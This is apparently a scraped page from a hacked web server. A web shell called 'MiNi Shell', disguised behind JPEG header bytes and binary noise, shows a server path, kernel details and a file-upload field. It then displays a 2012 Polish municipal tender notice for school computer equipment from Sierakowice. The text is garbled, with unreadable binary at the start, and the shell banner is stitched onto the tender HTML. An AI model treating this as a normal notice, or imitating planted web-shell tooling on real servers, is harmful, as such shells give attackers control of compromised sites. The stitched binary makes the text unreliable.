JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120823/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120823/311242-N-2012.html

<p class="kh_header"><b>Sierakowice: Dostawa urządzeń komputerowych wraz z ich instalacją w Zespołach Szkół w Kamienicy Królewskiej i Gowidlinie</b><br>
<b>Numer ogłoszenia: 311242 - 2012; data zamieszczenia: 23.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Sierakowice , ul. Lęborska 30, 83-340 Sierakowice, woj. pomorskie, tel. 58 6819500, faks 58 6819575.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sierakowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa urządzeń komputerowych wraz z ich instalacją w Zespołach Szkół w Kamienicy Królewskiej i Gowidlinie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> W związku z możliwością składania ofert częściowych, przedmiot zamówienia obejmuje: 

A/ Część nr I - Zespół Szkół w Kamienicy Królewskiej 
1. Przedmiotem niniejszego zamówienia jest dostawa urządzeń komputerowych do Zespołu Szkół w Kamienicy Królewskiej, w tym: 
a) 30 x komputerów przenośnych typu Laptop-PC, 
b) 1x urządzenie dostępowe będące elementem szkolnej sieci bezprzewodowej, 
c) 4 x urządzenia dostępowe do sieci Wlan typu Access Point, 
d) 1 x urządzenie dostępowe do sieci Internet typu Router, 
e) 2 x urządzenia wielofunkcyjne,
f) 1 x tablica interaktywna 78 cali,
g) 3 x projektory multimedialne, 
h)1 x szafka do przechowywania komputerów, 
i) 2 x wizualizery 
j) oprogramowanie:
1. system operacyjny - Windows 7 Home Premium (30 stanowisk), 
2. biurowe - Microsoft Office 2010 (30 stanowisk);
3. kompleksowe oprogramowanie antywirusowe (z zaporą sieciową) z subskrypcją aktualizacji bazy wirusów na okres co najmniej 3 lat (dla 30 stanowisk), , 
4. zabezpieczające komputery w przypadku kradzieży, 
5. do zarządzania zestawem przenośnym dla potrzeb prowadzenia zajęć dydaktycznych, 
6. zabezpieczające uczniów przed dostępem do treści niepożądanych w rozumieniu art. 4a ustawy z dnia 7 września 1991 r. o systemie oświaty.
2. Wymienione w pkt. 1 urządzenia muszę spełniać następujące warunki:
a) posiadają deklarację CE,
b) posiadają certyfikat ISO9001 dla producenta sprzętu, 
c) spełniają wymogi normy Energy Star 5.0 (komputery przenośne);
d) są wyprodukowane w 2012 r., fabrycznie nowe i wolne od obciążeń prawami osób trzecich,
e) posiadają okres gwarancji udzielony przez dostawcę nie krótszy niż 3 lata, a w przypadku tablicy interaktywnej nie krótszy niż 5 lat.  
3.Instalacja w/w urządzeń oraz oprogramowania, przeprowadzenie szkolenia dla 10 osób z zakresu obsługi poszczególnych urządzeń, w tym szczególności z obsługi oprogramowania wchodzącego w skład zamówienia. 

Szczegółowy opis przedmiotu zamówienia znajduje się w załączniku nr 7 do niniejszej SIWZ. 
W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:
 - opis urządzeń technicznych, instrukcję obsługi oraz środków stosowanych przez wykonawcę dostaw lub usług oraz opis zaplecza naukowo-badawczego wykonawcy, w celu potwierdzenia zapewnienia odpowiedniej jakości realizowanego zamówienia

UWAGA: Zamawiający informuje, że dla niniejszej części zamówienia należy przedłożyć fakturę VAT wystawioną na Gminę Sierakowice (stawka VAT 23 %).

B/ Część nr II - Zespół Szkół w Gowidlinie 

1. Przedmiotem niniejszego zamówienia jest dostawa urządzeń komputerowych do Zespołu Szkół w Gowidlinie, w tym: 
a) 14 zestawów stacjonarnych PC, 
b) 4 tablice interaktywne 78 cali, 
c) 2 projektory multimedialne, 
d) 2 komputery przenośne, 
e) 2 radiomagnetofony, 
f)  2 ekrany podwieszane, 
g) 2 x głośniki stereo do ekranu wraz z kompletem oprogramowania.
i) 16 licencji na oprogramowanie:
1. system operacyjny - Windows 7 Home Premium, 
2. kompleksowe oprogramowanie antywirusowe (z zaporą sieciową) z subskrypcją aktualizacji bazy wirusów na okres co najmniej 3 lat (dla 30 stanowisk), 
j) dzięciostanowiskowe oprogramowanie biurowe dla szkół - Microsoft Office 2010.

2. Wymienione w pkt. 1 urządzenia muszę spełniać następujące warunki:
a) posiadają deklarację CE,
b) posiadają certyfikat ISO9001 dla producenta sprzętu, 
c) spełniają wymogi normy Energy Star 5.0 (komputery przenośne);;
d) są wyprodukowane w 2012 r., fabrycznie nowe i wolne od obciążeń prawami osób trzecich,
e) posiadają okres gwarancji udzielony przez dostawcę nie krótszy niż 3 lata, a w przypadku tablicy interaktywnej nie krótszy niż 5 lat.  

Szczegółowy opis przedmiotu zamówienia znajduje się w załączniku nr 7 do niniejszej SIWZ. 
W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:
 - opis urządzeń technicznych, instrukcję obsługi oraz środków stosowanych przez wykonawcę dostaw lub usług oraz opis zaplecza naukowo-badawczego wykonawcy, w celu potwierdzenia zapewnienia odpowiedniej jakości realizowanego zamówienia

UWAGA: Zamawiający informuje, że dla niniejszej części zamówienia należy przedłożyć fakturę VAT wystawioną na Zespół Szkół w Gowidlinie, ul. Prymasa Wyszyńskiego 5, 83 - 341 Gowidlino, NIP 589-18-75-842, (stawka VAT 0 %)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia Wykonawcy zamówień uzupełniających w wysokości 20 % zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.20.00.00-1, 30.21.33.00-8, 30.23.21.00-5, 48.82.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 14.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Ustala się następującą wysokość wadium: 
A/ dla części zamówienia nr I w wysokości: 2.500,00 zł (dwa tysiące pięćset złotych 00/100)
B/ dla części zamówienia nr II w wysokości: 500,00 zł (pięćset złotych 00/100)
C/ dla całości przedmiotu zamówienia tj. dla części I i II łącznie w wysokości: 3.000,00 zł, (trzy tysiące złotych 00/100)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa warunku w/w zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli w złożonych dokumentach i oświadczenia Wykonawca jednoznacznie wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia jest krótszy w tym okresie, co najmniej:
) dla część I - jednego zamówienia, odpowiadającego zakresowi przedmiotu niniejszego zamówienia, polegającego na dostawie i instalacji urządzeń komputerowych o wartości minimum 100 000,00 zł brutto (słownie: sto tysięcy złotych 00/100). 
II) dla części II - jednego zamówienia  odpowiadającego zakresowi przedmiotu niniejszego zamówienia, polegającego na dostawie i instalacji urządzeń komputerowych o wartości minimum 40 000,00 zł brutto (słownie: czterdzieści tysięcy złotych 00/100). 
III) w przypadku Wykonawców składających ofertę dla części nr I i II łącznie - jednego zamówienia, odpowiadającego zakresowi przedmiotu niniejszego zamówienia, polegającego na dostawie i instalacji urządzeń komputerowych o wartości minimum 100 000,00 zł brutto (słownie: sto tysięcy złotych 00/100). Nie dopuszcza się sumowania mniejszych umów cząstkowych</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa warunku w w/w zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa warunku w w/w zakresie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa warunku w w/w zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">opis urządzeń technicznych, instrukcję obsługi oraz środków stosowanych przez wykonawcę dostaw lub usług oraz opis zaplecza naukowo-badawczego wykonawcy, w celu potwierdzenia zapewnienia odpowiedniej jakości realizowanego zamówienia</li>

</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>A) W przypadku zmiany stawki podatku VAT w trakcie trwania umowy Zamawiający dokona w drodze aneksu uaktualnienia stawki podatku VAT zgodnie z obowiązującą Ustawą od towarów i usług. Uaktualniona stawka podatku VAT będzie obowiązywała w dalszej realizacji przedmiotu zamówienia wynikającej z umowy.
B) Zamawiający na podstawie art. 144 dopuści zmianę umowy dotycząca przedmiotu lub umówionego terminu wykonania zamówienia w następujących przypadkach:
a) z powodu uzasadnionych zmian w zakresie sposobu wykonania przedmiotu zamówienia proponowanych przez Zamawiającego lub Wykonawcę, jeżeli te zmiany są korzystne dla zamawiającego,
b) zaistnienia po zawarciu umowy, przypadku siły wyższej, przez którą, na potrzeby niniejszego warunku rozumieć należy zdarzenie zewnętrzne wobec łączącej strony więzi prawnej:
- charakterze niezależnym od stron, którego strony nie mogły przewidzieć przed zawarciem umowy,
- którego nie można uniknąć ani któremu strony nie mogły zapobiec przy zachowaniu należytej staranności,
-  której nie można przypisać drugiej stronie;
c) za siłę wyższą warunkującą zmianę umowy uważać się będzie w szczególności: powódź, pożar i inne klęski żywiołowe, zamieszki, strajki, ataki terrorystyczne, działania wojenne, nagłe załamania warunków atmosferycznych nagłe przerwy w dostawie energii elektrycznej, promieniowanie lub skażenia.
d) okoliczności niezależnych od stron lub nieznanych stronom umowy w chwili jej zawarcia,
e) zmiany powszechnie obowiązujących przepisów prawa, norm w zakresie mającym wpływ na realizację przedmiotu zamówienia lub świadczenia stron, 
f) działania  organów administracji  publicznej, organów władzy, wymiaru sprawiedliwości, lub innych podmiotów trzecich, które  uniemożliwiają zgodne z prawem  wykonywanie zobowiązań umownych,
g) zmiana terminu zakończenia umowy jest również możliwa w sytuacji zawinionej przez zamawiającego
h) gdy zaistnieje inna, niemożliwa do przewidzenia w momencie zawarcia umowy okoliczność prawna, ekonomiczna lub techniczna, za którą żadna ze stron nie ponosi odpowiedzialności, skutkująca brakiem możliwości należytego wykonania umowy, zgodnie z SIWZ- zamawiający dopuszcza możliwość zmiany terminu realizacji umowy oraz terminu wynikającego z harmonogramu.
C) Warunki dokonywania zmian:
a) pisemne uzasadnienie konieczności i wpływu zmian na realizację zamówienia (np. protokół konieczności),
b) w formie pisemnego aneksu do umowy pod rygorem nieważności takiej zmiany.
D) Zmiany zapisów umowy, które nie odnoszą się do treści oferty nie wymagają pisemnego aneksu pod rygorem nieważności. Za zmiany takie uważa się np.:
a) zmianę rachunku bankowego,
b) zmiany adresowe,
c) zmiana osób do kontaktu</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.sierakowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> UG Sierakowice
ul. Lęborska 30
83-340 Sierakowice
pok. 201.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.08.2012 godzina 10:30, miejsce: UG Sierakowice
ul. Lęborska 30
83-340 Sierakowice
pok. 102.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt realizowany dzięki dotacji celowej z budżetu państwa przedsięwzięcia  w zakresie rozwijania kompetencji uczniów i nauczycieli w zakresie stosowania technologii informacyjno-komunikacyjnych realizowanego w Zespole Szkół w Kamienicy Królewskiej, w ramach programu pn.: Cyfrowa Szkoła..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa urządzeń komputerowych wraz z ich instalacją w Zespołach Szkół w Kamienicy Królewskiej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem niniejszego zamówienia jest dostawa urządzeń komputerowych do Zespołu Szkół w Kamienicy Królewskiej, w tym: 
a) 30 x komputerów przenośnych typu Laptop-PC, 
b) 1x urządzenie dostępowe będące elementem szkolnej sieci bezprzewodowej, 
c) 4 x urządzenia dostępowe do sieci Wlan typu Access Point, 
d) 1 x urządzenie dostępowe do sieci Internet typu Router, 
e) 2 x urządzenia wielofunkcyjne,
f) 1 x tablica interaktywna 78 cali,
g) 3 x projektory multimedialne, 
h)1 x szafka do przechowywania komputerów, 
i) 2 x wizualizery 
j) Oprogramowanie:
1. system operacyjny - Windows 7 Home Premium (30 stanowisk), 
2. biurowe - Microsoft Office 2010 (30 stanowisk);
3. antywirusowe (z zaporą sieciową) z 3 letnia subskrypcją aktualizacji bazy wirusów na okres co najmniej 3 lat (30 stanowisk), 
4. zabezpieczające komputery w przypadku kradzieży, 
5. do zarządzania zestawem przenośnym dla potrzeb prowadzenia zajęć dydaktycznych, 
6. zabezpieczające uczniów przed dostępem do treści niepożądanych w rozumieniu art. 4a ustawy z dnia 7 września 1991 r. o systemie oświaty.


2. Wymienione w pkt. 1 urządzenia muszę spełniać następujące warunki:
a) posiadają deklarację CE,
b) posiadają certyfikat ISO9001 dla producenta sprzętu, 
c) spełniają wymogi normy Energy Star 5.0 (komputery przenośne);
d) są wyprodukowane w 2012 r., fabrycznie nowe i wolne od obciążeń prawami osób trzecich,
e) posiadają okres gwarancji udzielony przez dostawcę nie krótszy niż 3 lata, a w przypadku tablicy interaktywnej nie krótszy niż 5 lat.  
3.Instalacja w/w urządzeń oraz oprogramowania, przeprowadzenie szkolenia dla 10 osób z zakresu obsługi poszczególnych urządzeń, w tym szczególności z obsługi oprogramowania wchodzącego w skład zamówienia.

UWAGA: Zamawiający informuje, że dla niniejszej części zamówienia należy przedłożyć fakturę VAT wystawioną na Gminę Sierakowice (stawka VAT 23 %)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.20.00.00-1, 30.21.33.00-8, 30.23.21.00-5, 48.82.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa urządzeń komputerowych wraz z ich instalacją w Zespołach Szkół w Gowidlinie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego zamówienia jest dostawa urządzeń komputerowych do Zespołu Szkół w Gowidlinie, w tym: 
a) 14 zestawów stacjonarnych PC, 
b) 4 tablice interaktywne 78 cali, 
c) 2 projektory multimedialne, 
d) 2 komputery przenośne, 
e) 2 radiomagnetofony, 
f)  2 ekrany podwieszane, 
g) 2 x głośniki stereo do ekranu wraz z kompletem oprogramowania.
i) Oprogramowanie:
1. system operacyjny - Windows 7 Home Premium (16 licencji)
2. kompleksowe oprogramowanie antywirusowe (z zaporą sieciową) z subskrypcją aktualizacji bazy wirusów na okres co najmniej 3 lat (16 stanowisk), 
3. dzięsięciostanowiskowe oprogramowanie biurowe dla szkół - Microsoft Office 2010.

2. Wymienione w pkt. 1 urządzenia muszę spełniać następujące warunki:
a) posiadają deklarację CE,
b) posiadają certyfikat ISO9001 dla producenta sprzętu, 
c) spełniają wymogi normy Energy Star 5.0 (komputery przenośne);;
d) są wyprodukowane w 2012 r., fabrycznie nowe i wolne od obciążeń prawami osób trzecich,
e) posiadają okres gwarancji udzielony przez dostawcę nie krótszy niż 3 lata, a w przypadku tablicy interaktywnej nie krótszy niż 5 lat.

UWAGA: Zamawiający informuje, że dla niniejszej części zamówienia należy przedłożyć fakturę VAT wystawioną na Zespół Szkół w Gowidlinie, ul. Prymasa Wyszyńskiego 5, 83 - 341 Gowidlino, NIP 589-18-75-842, (stawka VAT 0 %)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.20.00.00-1, 30.21.33.00-8, 30.23.21.00-2, 48.82.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com